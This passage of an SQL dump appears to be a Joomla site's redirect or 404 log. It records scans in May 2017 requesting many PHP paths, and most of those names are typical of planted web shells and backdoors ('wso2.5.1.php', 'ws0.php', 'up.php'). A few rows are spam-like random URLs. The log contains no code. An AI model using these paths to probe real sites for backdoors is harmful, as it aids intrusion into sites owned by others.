00:00:00'),(9498,'http://hallcrestheights.org/plugins/dpcalendar/dpcalendar_jcalpro/language/lv-lv/opts.php',NULL,'http://hallcrestheights.org/plugins/dpcalendar/dpcalendar_jcalpro/language/lv-lv/opts.php','',1,0,'2017-05-22 14:20:28','0000-00-00 00:00:00'),(9499,'http://hallcrestheights.org/plugins/dpcalendar/dpcalendar_rsevents/language/de-de/opts.php',NULL,'http://hallcrestheights.org/plugins/dpcalendar/dpcalendar_rsevents/language/de-de/opts.php','',1,0,'2017-05-22 14:20:28','0000-00-00 00:00:00'),(9500,'http://hallcrestheights.org/plugins/editors-xtd/sourcerer/index.php',NULL,'http://hallcrestheights.org/plugins/editors-xtd/sourcerer/index.php','',1,0,'2017-05-22 14:19:08','0000-00-00 00:00:00'),(9501,'http://hallcrestheights.org/plugins/editors/jckeditor/plugins/styles/config.php',NULL,'http://hallcrestheights.org/plugins/editors/jckeditor/plugins/styles/config.php','',1,0,'2017-05-22 14:21:05','0000-00-00 00:00:00'),(9502,'http://hallcrestheights.org/plugins/editors/rtl.php',NULL,'http://hallcrestheights.org/plugins/editors/rtl.php','',1,0,'2017-05-22 14:19:45','0000-00-00 00:00:00'),(9503,'http://hallcrestheights.org/plugins/editors/jckeditor/plugins/a11yhelp/config.php',NULL,'http://hallcrestheights.org/plugins/editors/jckeditor/plugins/a11yhelp/config.php','',1,0,'2017-05-22 14:21:06','0000-00-00 00:00:00'),(9504,'http://hallcrestheights.org/plugins/extension/connect.php',NULL,'http://hallcrestheights.org/plugins/extension/connect.php','',1,0,'2017-05-22 14:19:47','0000-00-00 00:00:00'),(9505,'http://hallcrestheights.org/plugins/editors/tinymce/fields/backup.php',NULL,'http://hallcrestheights.org/plugins/editors/tinymce/fields/backup.php','',1,0,'2017-05-22 14:21:07','0000-00-00 00:00:00'),(9506,'http://hallcrestheights.org/plugins/editors/tinymce/field/backup.php',NULL,'http://hallcrestheights.org/plugins/editors/tinymce/field/backup.php','',1,0,'2017-05-22 14:19:47','0000-00-00 00:00:00'),(9507,'http://hallcrestheights.org/plugins/fabrik_element/link/language/pt-pt/config.php',NULL,'http://hallcrestheights.org/plugins/fabrik_element/link/language/pt-pt/config.php','',1,0,'2017-05-22 14:21:07','0000-00-00 00:00:00'),(9508,'http://hallcrestheights.org/plugins/fabrik_element/yesno/language/pt-br/update.php',NULL,'http://hallcrestheights.org/plugins/fabrik_element/yesno/language/pt-br/update.php','',1,0,'2017-05-22 14:19:47','0000-00-00 00:00:00'),(9509,'http://hallcrestheights.org/plugins/kunena/easysocial/rtl.php',NULL,'http://hallcrestheights.org/plugins/kunena/easysocial/rtl.php','',1,0,'2017-05-22 14:21:08','0000-00-00 00:00:00'),(9510,'http://hallcrestheights.org/plugins/fabrik_list/radius_search/language/backup.php',NULL,'http://hallcrestheights.org/plugins/fabrik_list/radius_search/language/backup.php','',1,0,'2017-05-22 14:19:48','0000-00-00 00:00:00'),(9511,'http://hallcrestheights.org/plugins/installer/webinstaller/css/backup.php',NULL,'http://hallcrestheights.org/plugins/installer/webinstaller/css/backup.php','',1,0,'2017-05-22 14:21:08','0000-00-00 00:00:00'),(9512,'http://hallcrestheights.org/plugins/fieldsattachment/file/js/backup.php',NULL,'http://hallcrestheights.org/plugins/fieldsattachment/file/js/backup.php','',1,0,'2017-05-22 14:21:08','0000-00-00 00:00:00'),(9513,'http://hallcrestheights.org/plugins/editors/myjsp/tiny_mce/plugins/emoticons/img/setup.php',NULL,'http://hallcrestheights.org/plugins/editors/myjsp/tiny_mce/plugins/emoticons/img/setup.php','',1,0,'2017-05-22 14:21:09','0000-00-00 00:00:00'),(9514,'http://hallcrestheights.org/plugins/system/dpcalendar/language/vi-vn/opts.php',NULL,'http://hallcrestheights.org/plugins/system/dpcalendar/language/vi-vn/opts.php','',1,0,'2017-05-22 14:21:13','0000-00-00 00:00:00'),(9515,'http://hallcrestheights.org/plugins/system/jacontenttype/helpers/backup.php',NULL,'http://hallcrestheights.org/plugins/system/jacontenttype/helpers/backup.php','',1,0,'2017-05-22 14:20:26','0000-00-00 00:00:00'),(9516,'http://hallcrestheights.org/plugins/system/jsnframework/assets/3rd-party/jquery-daterangepicker/htaccess.php',NULL,'http://hallcrestheights.org/plugins/system/jsnframework/assets/3rd-party/jquery-daterangepicker/htaccess.php','',1,0,'2017-05-22 14:21:47','0000-00-00 00:00:00'),(9517,'http://hallcrestheights.org/plugins/user/contacts.php',NULL,'http://hallcrestheights.org/plugins/user/contacts.php','',1,0,'2017-05-22 14:20:27','0000-00-00 00:00:00'),(9518,'http://hallcrestheights.org/plugins/system/jsnframework/language/it-it/update.php',NULL,'http://hallcrestheights.org/plugins/system/jsnframework/language/it-it/update.php','',1,0,'2017-05-22 14:21:47','0000-00-00 00:00:00'),(9519,'http://hallcrestheights.org/plugins/user/profile/profiles/backup.php',NULL,'http://hallcrestheights.org/plugins/user/profile/profiles/backup.php','',1,0,'2017-05-22 14:21:47','0000-00-00 00:00:00'),(9520,'http://hallcrestheights.org/prefix.php',NULL,'http://hallcrestheights.org/prefix.php','',1,0,'2017-05-22 14:20:27','0000-00-00 00:00:00'),(9521,'http://hallcrestheights.org/security.php',NULL,'http://hallcrestheights.org/security.php','',1,0,'2017-05-22 14:21:47','0000-00-00 00:00:00'),(9522,'http://hallcrestheights.org/plugins/user/mosimage.php',NULL,'http://hallcrestheights.org/plugins/user/mosimage.php','',1,0,'2017-05-22 14:21:48','0000-00-00 00:00:00'),(9523,'http://hallcrestheights.org/qwerty.php',NULL,'http://hallcrestheights.org/qwerty.php','',1,0,'2017-05-22 14:20:28','0000-00-00 00:00:00'),(9524,'http://hallcrestheights.org/support.php',NULL,'http://hallcrestheights.org/support.php','',1,0,'2017-05-22 14:21:49','0000-00-00 00:00:00'),(9525,'http://hallcrestheights.org/settings.php',NULL,'http://hallcrestheights.org/settings.php','',2,0,'2017-05-22 14:21:49','0000-00-00 00:00:00'),(9526,'http://hallcrestheights.org/templates/atomic/error.php',NULL,'http://hallcrestheights.org/templates/atomic/error.php','',6,0,'2017-05-22 14:23:14','0000-00-00 00:00:00'),(9527,'http://hallcrestheights.org/templates/atomic/html/mod_custom/update.php',NULL,'http://hallcrestheights.org/templates/atomic/html/mod_custom/update.php','',1,0,'2017-05-22 14:23:14','0000-00-00 00:00:00'),(9528,'http://hallcrestheights.org/systemp.php',NULL,'http://hallcrestheights.org/systemp.php','',1,0,'2017-05-22 14:21:53','0000-00-00 00:00:00'),(9529,'http://hallcrestheights.org/templates/beez/version.php',NULL,'http://hallcrestheights.org/templates/beez/version.php','',1,0,'2017-05-22 14:23:15','0000-00-00 00:00:00'),(9530,'http://hallcrestheights.org/templates/atomic/html/extensions.php',NULL,'http://hallcrestheights.org/templates/atomic/html/extensions.php','',1,0,'2017-05-22 14:23:15','0000-00-00 00:00:00'),(9531,'http://hallcrestheights.org/templates/beez/html/com_search/search/hmtzww.php',NULL,'http://hallcrestheights.org/templates/beez/html/com_search/search/hmtzww.php','',1,0,'2017-05-22 14:23:16','0000-00-00 00:00:00'),(9532,'http://hallcrestheights.org/templates/beez3/html/com_contact/category/config.php',NULL,'http://hallcrestheights.org/templates/beez3/html/com_contact/category/config.php','',1,0,'2017-05-22 14:21:56','0000-00-00 00:00:00'),(9533,'http://hallcrestheights.org/templates/beez3/html/com_contact/categories/update.php',NULL,'http://hallcrestheights.org/templates/beez3/html/com_contact/categories/update.php','',1,0,'2017-05-22 14:23:17','0000-00-00 00:00:00'),(9534,'http://hallcrestheights.org/templates/beez3/html/com_content/archive/config.php',NULL,'http://hallcrestheights.org/templates/beez3/html/com_content/archive/config.php','',1,0,'2017-05-22 14:23:17','0000-00-00 00:00:00'),(9535,'http://hallcrestheights.org/templates/beez3/html/com_content/article/config.php',NULL,'http://hallcrestheights.org/templates/beez3/html/com_content/article/config.php','',1,0,'2017-05-22 14:23:17','0000-00-00 00:00:00'),(9536,'http://hallcrestheights.org/templates/beez3/html/com_content/category/config.php',NULL,'http://hallcrestheights.org/templates/beez3/html/com_content/category/config.php','',1,0,'2017-05-22 14:23:18','0000-00-00 00:00:00'),(9537,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-i20162634-k14800-abtnwyrq-semgwko-whme-mxgku-cybnpz.htm',NULL,'','',3,0,'2017-05-22 14:23:45','0000-00-00 00:00:00'),(9538,'http://hallcrestheights.org/templates/beez3/html/com_newsfeeds/category/config.php',NULL,'http://hallcrestheights.org/templates/beez3/html/com_newsfeeds/category/config.php','',1,0,'2017-05-22 14:25:35','0000-00-00 00:00:00'),(9539,'http://hallcrestheights.org/templates/beez3/html/com_content/form/config.php',NULL,'http://hallcrestheights.org/templates/beez3/html/com_content/form/config.php','',1,0,'2017-05-22 14:25:35','0000-00-00 00:00:00'),(9540,'http://hallcrestheights.org/templates/beez3/html/com_weblinks/backup.php',NULL,'http://hallcrestheights.org/templates/beez3/html/com_weblinks/backup.php','',1,0,'2017-05-22 14:25:35','0000-00-00 00:00:00'),(9541,'http://hallcrestheights.org/templates/beez3/html/com_weblinks/categories/update.php',NULL,'http://hallcrestheights.org/templates/beez3/html/com_weblinks/categories/update.php','',1,0,'2017-05-22 14:25:35','0000-00-00 00:00:00'),(9542,'http://hallcrestheights.org/templates/beez3/language/en-gb/backup.php',NULL,'http://hallcrestheights.org/templates/beez3/language/en-gb/backup.php','',1,0,'2017-05-22 14:25:36','0000-00-00 00:00:00'),(9543,'http://hallcrestheights.org/templates/beez3/html/com_weblinks/category/update.php',NULL,'http://hallcrestheights.org/templates/beez3/html/com_weblinks/category/update.php','',1,0,'2017-05-22 14:24:16','0000-00-00 00:00:00'),(9544,'http://hallcrestheights.org/templates/beez3/html/layouts/backup.php',NULL,'http://hallcrestheights.org/templates/beez3/html/layouts/backup.php','',1,0,'2017-05-22 14:25:37','0000-00-00 00:00:00'),(9545,'http://hallcrestheights.org/templates/beez5/cg-bn/lndex.php',NULL,'http://hallcrestheights.org/templates/beez5/cg-bn/lndex.php','',1,0,'2017-05-22 14:26:33','0000-00-00 00:00:00'),(9546,'http://hallcrestheights.org/templates/dlbvd.php',NULL,'http://hallcrestheights.org/templates/dlbvd.php','',1,0,'2017-05-22 14:26:33','0000-00-00 00:00:00'),(9547,'http://hallcrestheights.org/templates/eews.php',NULL,'http://hallcrestheights.org/templates/eews.php','',1,0,'2017-05-22 14:26:33','0000-00-00 00:00:00'),(9548,'http://hallcrestheights.org/templates/beez5/html/com_contact/backup.php',NULL,'http://hallcrestheights.org/templates/beez5/html/com_contact/backup.php','',1,0,'2017-05-22 14:26:33','0000-00-00 00:00:00'),(9549,'http://hallcrestheights.org/templates/ja_purity/wso2.5.1.php',NULL,'http://hallcrestheights.org/templates/ja_purity/wso2.5.1.php','',1,0,'2017-05-22 14:25:13','0000-00-00 00:00:00'),(9550,'http://hallcrestheights.org/templates/ja_purity/x.php',NULL,'http://hallcrestheights.org/templates/ja_purity/x.php','',1,0,'2017-05-22 14:25:14','0000-00-00 00:00:00'),(9551,'http://hallcrestheights.org/templates/ja_purity/smii.php',NULL,'http://hallcrestheights.org/templates/ja_purity/smii.php','',1,0,'2017-05-22 14:26:35','0000-00-00 00:00:00'),(9552,'http://hallcrestheights.org/templates/system/css/session.php',NULL,'http://hallcrestheights.org/templates/system/css/session.php','',1,0,'2017-05-22 14:26:35','0000-00-00 00:00:00'),(9553,'http://hallcrestheights.org/templates/system/html/gif.php',NULL,'http://hallcrestheights.org/templates/system/html/gif.php','',1,0,'2017-05-22 14:25:15','0000-00-00 00:00:00'),(9554,'http://hallcrestheights.org/templates/system/template.php',NULL,'http://hallcrestheights.org/templates/system/template.php','',3,0,'2017-05-22 14:26:35','0000-00-00 00:00:00'),(9555,'http://hallcrestheights.org/templates/system/sysinfo.php',NULL,'http://hallcrestheights.org/templates/system/sysinfo.php','',1,0,'2017-05-22 14:26:36','0000-00-00 00:00:00'),(9556,'http://hallcrestheights.org/templates/system/html/updates.php',NULL,'http://hallcrestheights.org/templates/system/html/updates.php','',1,0,'2017-05-22 14:25:16','0000-00-00 00:00:00'),(9557,'http://hallcrestheights.org/templates/system/html/mz.php',NULL,'http://hallcrestheights.org/templates/system/html/mz.php','',1,0,'2017-05-22 14:26:37','0000-00-00 00:00:00'),(9558,'http://hallcrestheights.org/tmp/jos.php',NULL,'http://hallcrestheights.org/tmp/jos.php','',1,0,'2017-05-22 14:27:21','0000-00-00 00:00:00'),(9559,'http://hallcrestheights.org/tmp/install.css.php',NULL,'http://hallcrestheights.org/tmp/install.css.php','',2,0,'2017-05-22 14:27:21','0000-00-00 00:00:00'),(9560,'http://hallcrestheights.org/templates/xcache.php',NULL,'http://hallcrestheights.org/templates/xcache.php','',1,0,'2017-05-22 14:27:21','0000-00-00 00:00:00'),(9561,'http://hallcrestheights.org/tmp/tmpl.php',NULL,'http://hallcrestheights.org/tmp/tmpl.php','',2,0,'2017-05-22 14:27:22','0000-00-00 00:00:00'),(9562,'http://hallcrestheights.org/tmp/r.php',NULL,'http://hallcrestheights.org/tmp/r.php','',2,0,'2017-05-22 14:26:02','0000-00-00 00:00:00'),(9563,'http://hallcrestheights.org/toor.php',NULL,'http://hallcrestheights.org/toor.php','',1,0,'2017-05-22 14:27:24','0000-00-00 00:00:00'),(9564,'http://hallcrestheights.org/vi5wrz.php',NULL,'http://hallcrestheights.org/vi5wrz.php','',1,0,'2017-05-22 14:27:24','0000-00-00 00:00:00'),(9565,'http://hallcrestheights.org/tmp/xmax.php',NULL,'http://hallcrestheights.org/tmp/xmax.php','',1,0,'2017-05-22 14:26:05','0000-00-00 00:00:00'),(9566,'http://hallcrestheights.org/uninstal.php',NULL,'http://hallcrestheights.org/uninstal.php','',1,0,'2017-05-22 14:26:04','0000-00-00 00:00:00'),(9567,'http://hallcrestheights.org/zonfig.php',NULL,'http://hallcrestheights.org/zonfig.php','',1,0,'2017-05-22 14:28:09','0000-00-00 00:00:00'),(9568,'http://hallcrestheights.org/ws0.php',NULL,'http://hallcrestheights.org/ws0.php','',28,0,'2017-05-22 14:26:50','0000-00-00 00:00:00'),(9569,'http://hallcrestheights.org/viewport-compatible.php',NULL,'http://hallcrestheights.org/viewport-compatible.php','',1,0,'2017-05-22 14:28:10','0000-00-00 00:00:00'),(9570,'http://www.hallcrestheights.org/cwhriw-k2529-gpekzqdw-kvum-i20162635-zbsai-imjz-fozgdvd-dqjvdob-knlyk/',NULL,'','',2,0,'2017-05-22 16:29:23','0000-00-00 00:00:00'),(9571,'http://hallcrestheights.org/libraries/sfn.php',NULL,'','',1,0,'2017-05-24 03:08:48','0000-00-00 00:00:00'),(9572,'http://hallcrestheights.org/android/zip_asdasd.php',NULL,'http://hallcrestheights.org/android/zip_asdasd.php','',1,0,'2017-05-24 07:47:55','0000-00-00 00:00:00'),(9573,'http://hallcrestheights.org/beta/administrator/templates/isis/less/config.php',NULL,'http://hallcrestheights.org/beta/administrator/templates/isis/less/config.php','',1,0,'2017-05-24 07:47:56','0000-00-00 00:00:00'),(9574,'http://hallcrestheights.org/bk/administrator/components/com_admin/postinstall/update.php',NULL,'http://hallcrestheights.org/bk/administrator/components/com_admin/postinstall/update.php','',1,0,'2017-05-24 07:47:56','0000-00-00 00:00:00'),(9575,'http://hallcrestheights.org/bk/libraries/joomla/crypt/password/config.php',NULL,'http://hallcrestheights.org/bk/libraries/joomla/crypt/password/config.php','',1,0,'2017-05-24 07:47:56','0000-00-00 00:00:00'),(9576,'http://hallcrestheights.org/components/com_banners/opcaches.php',NULL,'http://hallcrestheights.org/components/com_banners/opcaches.php','',1,0,'2017-05-24 07:48:25','0000-00-00 00:00:00'),(9577,'http://hallcrestheights.org/components/com_attachments/views/update/backup.php',NULL,'http://hallcrestheights.org/components/com_attachments/views/update/backup.php','',1,0,'2017-05-24 07:48:25','0000-00-00 00:00:00'),(9578,'http://hallcrestheights.org/components/com_contact/css.php',NULL,'http://hallcrestheights.org/components/com_contact/css.php','',1,0,'2017-05-24 07:48:25','0000-00-00 00:00:00'),(9579,'http://hallcrestheights.org/components/com_weblinks/helpers/htaccess.php',NULL,'http://hallcrestheights.org/components/com_weblinks/helpers/htaccess.php','',1,0,'2017-05-24 07:48:25','0000-00-00 00:00:00'),(9580,'http://hallcrestheights.org/components/com_jce/editor/tiny_mce/plugins/filemanager/htaccess.php',NULL,'http://hallcrestheights.org/components/com_jce/editor/tiny_mce/plugins/filemanager/htaccess.php','',1,0,'2017-05-24 07:47:05','0000-00-00 00:00:00'),(9581,'http://hallcrestheights.org/components/com_finder/views/search/tmpl/config.php',NULL,'http://hallcrestheights.org/components/com_finder/views/search/tmpl/config.php','',2,0,'2017-05-24 07:48:26','0000-00-00 00:00:00'),(9582,'http://hallcrestheights.org/cloud/assets/a8c30c3b/autocomplete/xcache.php',NULL,'http://hallcrestheights.org/cloud/assets/a8c30c3b/autocomplete/xcache.php','',1,0,'2017-05-24 07:47:06','0000-00-00 00:00:00'),(9583,'http://hallcrestheights.org/category.php',NULL,'http://hallcrestheights.org/category.php','',1,0,'2017-05-24 07:48:26','0000-00-00 00:00:00'),(9584,'http://hallcrestheights.org/components/com_jce/editor/tiny_mce/plugins/autolink/htaccess.php',NULL,'http://hallcrestheights.org/components/com_jce/editor/tiny_mce/plugins/autolink/htaccess.php','',1,0,'2017-05-24 07:48:26','0000-00-00 00:00:00'),(9585,'http://hallcrestheights.org/components/com_tz_portfolio/views/users/backup.php',NULL,'http://hallcrestheights.org/components/com_tz_portfolio/views/users/backup.php','',1,0,'2017-05-24 07:47:06','0000-00-00 00:00:00'),(9586,'http://hallcrestheights.org/cloud/resources/font-awesome/css/opcaches.php',NULL,'http://hallcrestheights.org/cloud/resources/font-awesome/css/opcaches.php','',1,0,'2017-05-24 07:48:26','0000-00-00 00:00:00'),(9587,'http://hallcrestheights.org/components/com_users/views/registration/tmpl/config.php',NULL,'http://hallcrestheights.org/components/com_users/views/registration/tmpl/config.php','',1,0,'2017-05-24 07:48:26','0000-00-00 00:00:00'),(9588,'http://hallcrestheights.org/components/com_search/views/index.php',NULL,'http://hallcrestheights.org/components/com_search/views/index.php','',1,0,'2017-05-24 07:48:27','0000-00-00 00:00:00'),(9589,'http://hallcrestheights.org/custom/2013/10-08/videos/backup.php',NULL,'http://hallcrestheights.org/custom/2013/10-08/videos/backup.php','',1,0,'2017-05-24 07:49:01','0000-00-00 00:00:00'),(9590,'http://hallcrestheights.org/files/docs/manual/itv/xcache.php',NULL,'http://hallcrestheights.org/files/docs/manual/itv/xcache.php','',1,0,'2017-05-24 07:47:41','0000-00-00 00:00:00'),(9591,'http://hallcrestheights.org/inflataboxes.com-oldwebsite-backup/administrator/components/com_menus/models/forms/update.php',NULL,'http://hallcrestheights.org/inflataboxes.com-oldwebsite-backup/administrator/components/com_menus/models/forms/update.php','',1,0,'2017-05-24 07:49:02','0000-00-00 00:00:00'),(9592,'http://hallcrestheights.org/images/joomgallery/details/2007_10/schuetzenfest_32/samstag_morgen_40/htaccess.php',NULL,'http://hallcrestheights.org/images/joomgallery/details/2007_10/schuetzenfest_32/samstag_morgen_40/htaccess.php','',1,0,'2017-05-24 07:49:02','0000-00-00 00:00:00'),(9593,'http://hallcrestheights.org/images/products/xxxx-smile.php',NULL,'http://hallcrestheights.org/images/products/xxxx-smile.php','',1,0,'2017-05-24 07:49:02','0000-00-00 00:00:00'),(9594,'http://hallcrestheights.org/images/yootheme/demo/ruby/backup.php',NULL,'http://hallcrestheights.org/images/yootheme/demo/ruby/backup.php','',1,0,'2017-05-24 07:49:02','0000-00-00 00:00:00'),(9595,'http://hallcrestheights.org/images/5673775162454.php',NULL,'http://hallcrestheights.org/images/5673775162454.php','',1,0,'2017-05-24 07:49:02','0000-00-00 00:00:00'),(9596,'http://hallcrestheights.org/error-files/modules/mod_imagestyle/mod_imagestyle.php',NULL,'http://hallcrestheights.org/error-files/modules/mod_imagestyle/mod_imagestyle.php','',1,0,'2017-05-24 07:49:02','0000-00-00 00:00:00'),(9597,'http://hallcrestheights.org/images/mosimage.php',NULL,'http://hallcrestheights.org/images/mosimage.php','',1,0,'2017-05-24 07:49:02','0000-00-00 00:00:00'),(9598,'http://hallcrestheights.org/components/com_xmap/views/xml/backup.php',NULL,'http://hallcrestheights.org/components/com_xmap/views/xml/backup.php','',1,0,'2017-05-24 07:49:03','0000-00-00 00:00:00'),(9599,'http://hallcrestheights.org/includes/d.php',NULL,'http://hallcrestheights.org/includes/d.php','',3,0,'2017-05-24 07:49:03','0000-00-00 00:00:00'),(9600,'http://hallcrestheights.org/modules/mod_arateiclws/mod_arateiclws.php',NULL,'http://hallcrestheights.org/modules/mod_arateiclws/mod_arateiclws.php','',1,0,'2017-05-24 07:49:32','0000-00-00 00:00:00'),(9601,'http://hallcrestheights.org/libraries/gantry/assets/jui/img/update.php',NULL,'http://hallcrestheights.org/libraries/gantry/assets/jui/img/update.php','',1,0,'2017-05-24 07:49:32','0000-00-00 00:00:00'),(9602,'http://hallcrestheights.org/modules/mod_slideshowck/images/slides2/update.php',NULL,'http://hallcrestheights.org/modules/mod_slideshowck/images/slides2/update.php','',1,0,'2017-05-24 07:49:32','0000-00-00 00:00:00'),(9603,'http://hallcrestheights.org/libraries/cegcore/extensions/editors/assets/config.php',NULL,'http://hallcrestheights.org/libraries/cegcore/extensions/editors/assets/config.php','',1,0,'2017-05-24 07:49:32','0000-00-00 00:00:00'),(9604,'http://hallcrestheights.org/kebaramy/templates/beez5/index.php',NULL,'http://hallcrestheights.org/kebaramy/templates/beez5/index.php','',1,0,'2017-05-24 07:48:12','0000-00-00 00:00:00'),(9605,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/ws0.php',NULL,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/ws0.php','',1,0,'2017-05-24 07:48:13','0000-00-00 00:00:00'),(9606,'http://hallcrestheights.org/libraries/joomla/twrp.php',NULL,'http://hallcrestheights.org/libraries/joomla/twrp.php','',1,0,'2017-05-24 07:49:33','0000-00-00 00:00:00'),(9607,'http://hallcrestheights.org/libraries/vendor/ircmaxell/password-compat/backup.php',NULL,'http://hallcrestheights.org/libraries/vendor/ircmaxell/password-compat/backup.php','',1,0,'2017-05-24 07:49:33','0000-00-00 00:00:00'),(9608,'http://hallcrestheights.org/layouts/joomla/editors/buttons/backup.php',NULL,'http://hallcrestheights.org/layouts/joomla/editors/buttons/backup.php','',1,0,'2017-05-24 07:48:13','0000-00-00 00:00:00'),(9609,'http://hallcrestheights.org/libraries/vendor/leafo/lessphp/backup.php',NULL,'http://hallcrestheights.org/libraries/vendor/leafo/lessphp/backup.php','',1,0,'2017-05-24 07:49:33','0000-00-00 00:00:00'),(9610,'http://hallcrestheights.org/modules/mod_rokdownloads_recent_updates/media-views-rtl.php',NULL,'http://hallcrestheights.org/modules/mod_rokdownloads_recent_updates/media-views-rtl.php','',1,0,'2017-05-24 07:49:34','0000-00-00 00:00:00'),(9611,'http://www.hallcrestheights.org/dvisciw-i20162633-bvwkuxkr-bzomsmvu-clzuphv-k828-qawuox-zmnpz-vsgcrlyc-mczo.htm',NULL,'http://search.yahoo.co.jp/','',2,0,'2017-05-24 14:29:56','0000-00-00 00:00:00'),(9612,'http://www.hallcrestheights.org/ajqxx-ucuzao-fifep-i20162635-hiij-imjnjbo-gtsakbcc-k45877-gyfmdvju/',NULL,'','',1,0,'2017-05-24 18:09:05','0000-00-00 00:00:00'),(9613,'http://www.hallcrestheights.org/k15720-ryvhrhmq-tyysl-i20162632-lgeajanp-dmefnxh-qfhj-dyhao-xrcjhw-uvds-vezytwlc-ycwscpua.htm',NULL,'http://search.yahoo.co.jp/','',1,0,'2017-05-25 04:55:28','0000-00-00 00:00:00'),(9614,'http://www.hallcrestheights.org/k15820-jgletkym-drqzn-i20162632-rvmlkswa-zvkecqq-neei.htm',NULL,'','',4,0,'2017-05-25 12:37:34','0000-00-00 00:00:00'),(9615,'http://hallcrestheights.org/1.php',NULL,'','',3,0,'2017-05-25 13:12:58','0000-00-00 00:00:00'),(9616,'http://hallcrestheights.org/3.php',NULL,'','',1,0,'2017-05-25 13:13:01','0000-00-00 00:00:00'),(9617,'http://hallcrestheights.org/4.php',NULL,'','',1,0,'2017-05-25 13:13:01','0000-00-00 00:00:00'),(9618,'http://hallcrestheights.org/5.php',NULL,'','',1,0,'2017-05-25 13:13:03','0000-00-00 00:00:00'),(9619,'http://hallcrestheights.org/6.php',NULL,'','',1,0,'2017-05-25 13:13:04','0000-00-00 00:00:00'),(9620,'http://hallcrestheights.org/8.php',NULL,'','',1,0,'2017-05-25 13:13:06','0000-00-00 00:00:00'),(9621,'http://hallcrestheights.org/9.php',NULL,'','',1,0,'2017-05-25 13:13:07','0000-00-00 00:00:00'),(9622,'http://hallcrestheights.org/a.php',NULL,'','',1,0,'2017-05-25 13:13:09','0000-00-00 00:00:00'),(9623,'http://hallcrestheights.org/b.php',NULL,'','',4,0,'2017-05-25 13:11:50','0000-00-00 00:00:00'),(9624,'http://hallcrestheights.org/e.php',NULL,'','',1,0,'2017-05-25 13:13:12','0000-00-00 00:00:00'),(9625,'http://hallcrestheights.org/g.php',NULL,'','',1,0,'2017-05-25 13:13:13','0000-00-00 00:00:00'),(9626,'http://hallcrestheights.org/h.php',NULL,'','',1,0,'2017-05-25 13:13:14','0000-00-00 00:00:00'),(9627,'http://hallcrestheights.org/i.php',NULL,'','',1,0,'2017-05-25 13:13:14','0000-00-00 00:00:00'),(9628,'http://hallcrestheights.org/j.php',NULL,'','',1,0,'2017-05-25 13:11:55','0000-00-00 00:00:00'),(9629,'http://hallcrestheights.org/l.php',NULL,'','',1,0,'2017-05-25 13:11:57','0000-00-00 00:00:00'),(9630,'http://hallcrestheights.org/n.php',NULL,'','',1,0,'2017-05-25 13:11:59','0000-00-00 00:00:00'),(9631,'http://hallcrestheights.org/p.php',NULL,'','',1,0,'2017-05-25 13:11:59','0000-00-00 00:00:00'),(9632,'http://hallcrestheights.org/q.php',NULL,'','',1,0,'2017-05-25 13:13:20','0000-00-00 00:00:00'),(9633,'http://hallcrestheights.org/r.php',NULL,'','',1,0,'2017-05-25 13:12:01','0000-00-00 00:00:00'),(9634,'http://hallcrestheights.org/s.php',NULL,'','',3,0,'2017-05-25 13:13:21','0000-00-00 00:00:00'),(9635,'http://hallcrestheights.org/u.php',NULL,'','',26,0,'2017-05-25 13:12:02','0000-00-00 00:00:00'),(9636,'http://hallcrestheights.org/v.php',NULL,'','',1,0,'2017-05-25 13:12:03','0000-00-00 00:00:00'),(9637,'http://hallcrestheights.org/w.php',NULL,'','',2,0,'2017-05-25 13:13:24','0000-00-00 00:00:00'),(9638,'http://hallcrestheights.org/y.php',NULL,'','',2,0,'2017-05-25 13:13:25','0000-00-00 00:00:00'),(9639,'http://hallcrestheights.org/10.php',NULL,'','',1,0,'2017-05-25 13:13:26','0000-00-00 00:00:00'),(9640,'http://hallcrestheights.org/11.php',NULL,'','',1,0,'2017-05-25 13:12:07','0000-00-00 00:00:00'),(9641,'http://hallcrestheights.org/12.php',NULL,'','',1,0,'2017-05-25 13:12:07','0000-00-00 00:00:00'),(9642,'http://hallcrestheights.org/bb.php',NULL,'','',1,0,'2017-05-25 13:13:28','0000-00-00 00:00:00'),(9643,'http://hallcrestheights.org/ee.php',NULL,'','',1,0,'2017-05-25 13:12:10','0000-00-00 00:00:00'),(9644,'http://hallcrestheights.org/ff.php',NULL,'','',1,0,'2017-05-25 13:12:11','0000-00-00 00:00:00'),(9645,'http://hallcrestheights.org/gg.php',NULL,'','',1,0,'2017-05-25 13:12:11','0000-00-00 00:00:00'),(9646,'http://hallcrestheights.org/a9.php',NULL,'','',1,0,'2017-05-25 13:13:32','0000-00-00 00:00:00'),(9647,'http://hallcrestheights.org/as.php',NULL,'','',1,0,'2017-05-25 13:13:33','0000-00-00 00:00:00'),(9648,'http://hallcrestheights.org/cp.php',NULL,'','',1,0,'2017-05-25 13:13:34','0000-00-00 00:00:00'),(9649,'http://hallcrestheights.org/cw.php',NULL,'','',1,0,'2017-05-25 13:13:35','0000-00-00 00:00:00'),(9650,'http://hallcrestheights.org/bo.php',NULL,'','',1,0,'2017-05-25 13:13:36','0000-00-00 00:00:00'),(9651,'http://hallcrestheights.org/dz.php',NULL,'','',1,0,'2017-05-25 13:13:37','0000-00-00 00:00:00'),(9652,'http://hallcrestheights.org/hb.php',NULL,'','',1,0,'2017-05-25 13:13:37','0000-00-00 00:00:00'),(9653,'http://hallcrestheights.org/k2.php',NULL,'','',1,0,'2017-05-25 13:13:38','0000-00-00 00:00:00'),(9654,'http://hallcrestheights.org/ls.php',NULL,'','',1,0,'2017-05-25 13:13:38','0000-00-00 00:00:00'),(9655,'http://hallcrestheights.org/p8.php',NULL,'','',1,0,'2017-05-25 13:13:39','0000-00-00 00:00:00'),(9656,'http://hallcrestheights.org/sa.php',NULL,'','',1,0,'2017-05-25 13:13:40','0000-00-00 00:00:00'),(9657,'http://hallcrestheights.org/ss.php',NULL,'','',1,0,'2017-05-25 13:12:20','0000-00-00 00:00:00'),(9658,'http://hallcrestheights.org/up.php',NULL,'','',38,0,'2017-05-25 13:13:41','0000-00-00 00:00:00'),(9659,'http://hallcrestheights.org/up1.php',NULL,'','',1,0,'2017-05-25 13:13:42','0000-00-00 00:00:00'),(9660,'http://hallcrestheights.org/up2.php',NULL,'','',1,0,'2017-05-25 13:12:24','0000-00-00 00:00:00'),(9661,'http://hallcrestheights.org/up3.php',NULL,'','',1,0,'2017-05-25 13:13:45','0000-00-00 00:00:00'),(9662,'http://hallcrestheights.org/xz.php',NULL,'','',1,0,'2017-05-25 13:13:47','0000-00-00 00:00:00'),(9663,'http://hallcrestheights.org/12..php',NULL,'','',1,0,'2017-05-25 